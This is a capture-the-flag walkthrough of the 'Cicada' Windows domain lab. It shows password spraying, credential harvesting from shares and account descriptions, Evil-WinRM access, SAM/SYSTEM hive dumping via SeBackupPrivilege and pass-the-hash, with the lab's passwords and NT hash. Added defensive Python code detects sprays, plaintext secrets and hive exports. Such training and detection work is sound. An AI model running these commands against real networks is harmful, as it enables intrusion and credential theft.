htb cicada

Information Gathering

# Nmap 7.98 scan initiated Thu Jan  1 08:52:11 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-01 15:22:10Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-01T15:23:37+00:00; +6h29m42s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:     9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1:   2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-01T15:23:37+00:00; +6h29m42s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:     9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1:   2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-01T15:23:37+00:00; +6h29m42s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:     9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1:   2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:     9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1:   2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
|_SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
|_ssl-date: 2026-01-01T15:23:38+00:00; +6h29m42s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/1%Time=695635D0%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.858 days (since Tue Dec 30 12:18:10 2025)
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-01T15:22:57
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h29m41s, deviation: 0s, median: 6h29m41s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan  1 08:53:56 2026 -- 1 IP address (1 host up) scanned in 104.94 seconds

Vulnerability Analysis

  Cicada nxc smb cicada.htb -u 'guest' -p '' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share
  Cicada smbclient //cicada.htb/HR -N
smb: \> more "Notice from HR.txt"
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Exploitation (User Flag)

We now have a password (Cicada$M6Corpb*@Lp#nZp!8); the next step is to find usernames to try it against.

Enumerate the domain and extract the user accounts (the entries tagged SidTypeUser in a.txt) into a user list:

cat a.txt|grep 'SidTypeUser'|awk '{print $2}' > users.txt

Password spraying: nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

SMB 10.10.11.35 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
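The spray above has a very recognisable shape from the domain controller's side: one source address, one short time window, failed logons against many different accounts, and then a single success. The following is an added example, not code from the writeup or from nxc, that implements that detection over constructed records shaped like Security event 4625 (failed logon) and 4624 (successful logon) as a SIEM would export them. The field names (TargetUserName, IpAddress, Status, TimeCreated) are the event's own; the timestamps, addresses and the ordering of attempts are made up for the sample.

```python
"""Password-spray detection over Windows logon events (added example).

The records below are constructed to mimic Security events 4625/4624 as
exported by a SIEM. A spray produces one source address walking many
accounts within seconds, mostly with STATUS_WRONG_PASSWORD (0xC000006D);
a user mistyping their own password produces one account, a few times,
spread out in time.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4625, "TimeCreated": f"2026-01-01T15:30:{i:02d}",
     "TargetUserName": user, "IpAddress": "10.10.14.7", "Status": "0xC000006D"}
    for i, user in enumerate([
        "Administrator", "Guest", "krbtgt", "john.smoulder", "sarah.dantelia",
        "michael.wrightson", "david.orelious", "emily.oscars",
    ], start=1)
] + [
    # Background noise: one user, three failures over half an hour.
    {"EventID": 4625, "TimeCreated": "2026-01-01T15:10:12", "TargetUserName": "sarah.dantelia",
     "IpAddress": "10.10.20.5", "Status": "0xC000006D"},
    {"EventID": 4625, "TimeCreated": "2026-01-01T15:21:40", "TargetUserName": "sarah.dantelia",
     "IpAddress": "10.10.20.5", "Status": "0xC000006D"},
    {"EventID": 4625, "TimeCreated": "2026-01-01T15:38:03", "TargetUserName": "sarah.dantelia",
     "IpAddress": "10.10.20.5", "Status": "0xC000006D"},
    # The one credential the spray found: a success right after the failures.
    {"EventID": 4624, "TimeCreated": "2026-01-01T15:30:09", "TargetUserName": "michael.wrightson",
     "IpAddress": "10.10.14.7", "Status": "0x0"},
]


def detect_spray(events, window_seconds=300, min_distinct_users=5):
    """Return one alert per source address that failed logons against at
    least `min_distinct_users` distinct accounts inside any sliding window
    of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    by_ip = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4625:
            continue
        when = datetime.fromisoformat(ev["TimeCreated"])
        by_ip[ev["IpAddress"]].append((when, ev["TargetUserName"].lower()))

    alerts = []
    for ip, recs in by_ip.items():
        recs.sort()
        best = []   # densest window (most distinct users) seen for this source
        start = 0
        for end in range(len(recs)):
            # Slide the left edge until the window fits within window_seconds.
            while recs[end][0] - recs[start][0] > window:
                start += 1
            current = recs[start:end + 1]
            if len({u for _, u in current}) > len({u for _, u in best}):
                best = current
        users = sorted({u for _, u in best})
        if len(users) >= min_distinct_users:
            alerts.append({
                "source_ip": ip,
                "distinct_users": users,
                "attempts": len(best),
                "first_seen": best[0][0].isoformat(),
                "last_seen": best[-1][0].isoformat(),
            })
    return alerts


def successes_after_spray(events, alerts):
    """Map each spraying source to the accounts that logged on from it
    (event 4624) after the spray began: the credentials the spray found."""
    hits = {}
    for alert in alerts:
        since = datetime.fromisoformat(alert["first_seen"])
        users = sorted({
            ev["TargetUserName"].lower() for ev in events
            if ev.get("EventID") == 4624
            and ev["IpAddress"] == alert["source_ip"]
            and datetime.fromisoformat(ev["TimeCreated"]) >= since
        })
        if users:
            hits[alert["source_ip"]] = users
    return hits


if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    for a in found:
        print(f"[spray] {a['source_ip']}: {len(a['distinct_users'])} accounts in "
              f"{a['attempts']} attempts between {a['first_seen']} and {a['last_seen']}")
    print("logons after spray:", successes_after_spray(SAMPLE_EVENTS, found))
```

Two tuning points matter in practice. SMB authentication from a tool like nxc shows up on the DC as NTLM network logons, so the same pattern is visible in event 4776 (credential validation) even when the target server's 4625 is missing; and a slow spray that spaces attempts beyond the window will not trip a fixed window, so the distinct-user count per source per day is a useful second, coarser alert.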

No additional shares are accessible with this account.

Enumerate the other users:

  Cicada nxc smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.10.11.35     445    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.35     445    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain
SMB         10.10.11.35     445    CICADA-DC        Guest                         2024-08-28 17:26:56 0       Built-in account for guest access to the computer/domain
SMB         10.10.11.35     445    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account
SMB         10.10.11.35     445    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1
SMB         10.10.11.35     445    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1
SMB         10.10.11.35     445    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0
SMB         10.10.11.35     445    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0

david.orelious:aRt$Lp#7t*VQ!3

  Cicada nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ
SMB         10.10.11.35     445    CICADA-DC        HR              READ
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share

The DEV share is now readable.

Backup_script.ps1 is found in the share:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

emily.oscars:Q!3@Lp#M6b*7t*Vt
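Three of the credentials in this box leak the same way: a password written into free text (the HR notice on the share, and david.orelious's account description field) and a password literal in a script left on a share. An added example, not code from the writeup or from nxc, showing the audit a defender can run for both patterns. The account list and script text below are constructed from what the writeup shows; the regexes and the `looks_like_secret` heuristic are this example's own and will need tuning on a real directory.

```python
"""Find plaintext credentials in AD description fields and in scripts on
file shares (added example; inputs constructed from the writeup)."""
import re

# Free text: the word password/passwd/pwd, an optional "is" or separator,
# then a token of 8+ non-space characters.
FREE_TEXT_RE = re.compile(
    r"\b(?:password|passwd|pwd)\b\s*(?:is)?\s*[:=]?\s*(\S{8,})", re.IGNORECASE)

# PowerShell: a string literal fed to ConvertTo-SecureString, or an assignment
# to a variable whose name suggests a secret. Scripts have syntax, so these
# are used instead of the free-text heuristic there.
PS_PATTERNS = [
    re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?[\"']([^\"']+)[\"']", re.IGNORECASE),
    re.compile(r"\$\w*(?:pass|pwd|secret|token)\w*\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE),
]

# Constructed from the nxc --users output in the writeup.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "description": "Built-in account for administering the computer/domain"},
    {"sAMAccountName": "Guest", "description": "Built-in account for guest access to the computer/domain"},
    {"sAMAccountName": "krbtgt", "description": "Key Distribution Center Service Account"},
    {"sAMAccountName": "john.smoulder", "description": ""},
    {"sAMAccountName": "sarah.dantelia", "description": None},
    {"sAMAccountName": "michael.wrightson", "description": ""},
    {"sAMAccountName": "david.orelious", "description": "Just in case I forget my password is aRt$Lp#7t*VQ!3"},
    {"sAMAccountName": "emily.oscars", "description": ""},
]

# Constructed excerpt of the HR notice from the share.
SAMPLE_HR_NOTICE = """Welcome to Cicada Corp! As part of our security protocols, it's essential
that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Remember, your password is a crucial aspect of keeping your account secure."""

# Constructed copy of Backup_script.ps1 as shown in the writeup.
SAMPLE_SCRIPT = r'''$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
Compress-Archive -Path $sourceDirectory -DestinationPath "D:\Backup\smb_backup.zip"'''


def looks_like_secret(token):
    """Reject plain words: 8+ characters from at least two of the classes
    lower, upper, digit, symbol."""
    classes = sum([
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ])
    return len(token) >= 8 and classes >= 2


def find_secrets_in_text(text):
    """Candidate passwords in free text, in order of appearance, de-duplicated."""
    found = []
    for m in FREE_TEXT_RE.finditer(text):
        # Trim sentence punctuation; a password that really ends in "." is missed.
        token = m.group(1).rstrip(".,;\"')")
        if looks_like_secret(token) and token not in found:
            found.append(token)
    return found


def audit_descriptions(accounts):
    """(sAMAccountName, candidate) pairs for accounts whose description
    attribute appears to contain a password."""
    findings = []
    for acct in accounts:
        for secret in find_secrets_in_text(acct.get("description") or ""):
            findings.append((acct["sAMAccountName"], secret))
    return findings


def audit_script(text):
    """Hard-coded credential literals in PowerShell source. Every literal is
    reported: a weak password in a script is still a credential on a share."""
    found = []
    for pattern in PS_PATTERNS:
        for m in pattern.finditer(text):
            if m.group(1) not in found:
                found.append(m.group(1))
    return found


if __name__ == "__main__":
    print("descriptions:", audit_descriptions(SAMPLE_ACCOUNTS))
    print("hr notice:   ", find_secrets_in_text(SAMPLE_HR_NOTICE))
    print("script:      ", audit_script(SAMPLE_SCRIPT))
```

The description check is cheap to run against a whole domain: any authenticated user can read the description attribute, which is exactly why a password there is equivalent to posting it on the intranet. The script check is the same secret-scanning idea applied to share contents; the fix for the backup script is a credential that is not in the file at all (a managed service account, or a secret read at run time from a vault or DPAPI-protected store), not a differently encoded literal.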

Try evil-winrm:

evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Privilege Escalation (Root Flag)

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Following this article:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam C:\temp\sam.hive
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system C:\temp\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temp> download sam.hive

Info: Downloading C:\temp\sam.hive to sam.hive

Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.hive

Info: Downloading C:\temp\system.hive to system.hive
  Cicada impacket-secretsdump -sam sam.hive -system system.hive LOCAL
# Administrator NT hash: 2b87e7c93a3e8a0ea4a581937016f341 (crack it, or use it directly as below)

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb
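The privilege escalation above leaves a clear trail: two `reg save` commands against hklm\sam and hklm\system, spawned from a WinRM session by an account holding SeBackupPrivilege. An added example, not code from the writeup or from any tool it uses, that flags those hive exports in process-creation telemetry. The records are constructed to resemble Security event 4688 with command-line auditing enabled (or Sysmon event 1); the field names used here (User, NewProcessName, ParentProcessName, CommandLine) are simplified for the sample, and the benign entries are invented to show what must not alert.

```python
"""Detect exports of the SAM/SYSTEM/SECURITY registry hives from
process-creation events (added example; sample records constructed)."""
import re

# reg / reg.exe followed by save|export of one of the three credential hives.
HIVE_DUMP_RE = re.compile(
    r"\breg(?:\.exe)?\s+(save|export)\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b",
    re.IGNORECASE,
)

# WinRM remote shells (Evil-WinRM included) run under the WS-Management
# plugin host, so this parent marks a command as coming from a remote session.
REMOTE_SHELL_PARENTS = {"wsmprovhost.exe"}

REG = r"C:\Windows\System32\reg.exe"
SAMPLE_PROCESS_EVENTS = [  # constructed
    {"User": r"CICADA\emily.oscars", "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "NewProcessName": REG, "CommandLine": r"reg save hklm\sam C:\temp\sam.hive"},
    {"User": r"CICADA\emily.oscars", "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "NewProcessName": REG, "CommandLine": r"reg save hklm\system C:\temp\system.hive"},
    # Benign: a read-only query, an HKCU export, and a non-credential hive save.
    {"User": r"CICADA\svc_inventory", "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": REG,
     "CommandLine": r'"C:\Windows\System32\reg.exe" query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'},
    {"User": r"CICADA\john.smoulder", "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": REG, "CommandLine": r"reg export HKCU\Software\Contoso C:\Users\john.smoulder\contoso.reg"},
    {"User": r"CICADA\svc_gpo", "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": REG, "CommandLine": r"reg save HKLM\SOFTWARE\Policies C:\temp\policies.hiv"},
]


def normalize(cmd):
    """Lower-case, drop quoting and collapse whitespace so the pattern is
    stable across the ways reg.exe can be invoked."""
    return re.sub(r"\s+", " ", cmd.replace('"', "").replace("'", "")).strip().lower()


def detect_hive_dumps(events):
    """One alert per process-creation event that exports SAM, SYSTEM or SECURITY."""
    alerts = []
    for ev in events:
        m = HIVE_DUMP_RE.search(normalize(ev.get("CommandLine", "")))
        if not m:
            continue
        parent = ev.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
        alerts.append({
            "user": ev.get("User"),
            "verb": m.group(1),
            "hive": m.group(2),
            "remote_session": parent in REMOTE_SHELL_PARENTS,
            "command": ev["CommandLine"],
        })
    return alerts


def group_by_user(alerts):
    """Hives exported per user. SAM together with SYSTEM is what an offline
    secrets dump needs, so the pair deserves a higher severity than one hive."""
    grouped = {}
    for a in alerts:
        grouped.setdefault(a["user"], set()).add(a["hive"])
    return {user: sorted(hives) for user, hives in grouped.items()}


if __name__ == "__main__":
    found = detect_hive_dumps(SAMPLE_PROCESS_EVENTS)
    for a in found:
        where = "remote shell" if a["remote_session"] else "local"
        print(f"[hive export] {a['user']} {a['verb']} {a['hive']} ({where}): {a['command']}")
    print("per user:", group_by_user(found))
```

Event 4688 only carries the command line when the "Include command line in process creation events" policy is on, so without it (or Sysmon) this rule has nothing to match. The detection covers the reg.exe path the writeup takes; the underlying condition is that emily.oscars holds SeBackupPrivilege, which comes with Backup Operators membership, so reviewing who sits in that group on domain controllers is the control that removes the whole class rather than one command.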

Lessons Learned
